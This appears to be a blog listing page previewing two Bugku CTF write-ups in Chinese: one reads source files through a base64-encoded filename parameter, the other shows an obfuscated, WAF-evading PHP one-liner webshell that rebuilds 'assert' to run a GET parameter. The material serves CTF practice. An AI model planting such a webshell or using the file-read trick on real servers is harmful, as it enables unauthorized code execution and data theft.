![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
打嗝儿
这个作者很懒,什么都没留下…
展开
-
Bugku cookies欺骗
Bugku cookies欺骗 1.点开链接显示字符串 2.filename=a2V5cy50eHQ= base64解码为keys.txt,将index.php通过base64编码,查看源码 url为:http://114.67.246.176:19276/index.php?line=1&filename=aW5kZXgucGhw 通过python脚本读取全部内容: import requests for i in range(30): url = "http://11...原创 2021-08-08 15:41:26 · 163 阅读 · 0 评论 -
Bugku-CTF-shell-过狗一句话
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.原创 2021-08-08 16:43:46 · 399 阅读 · 0 评论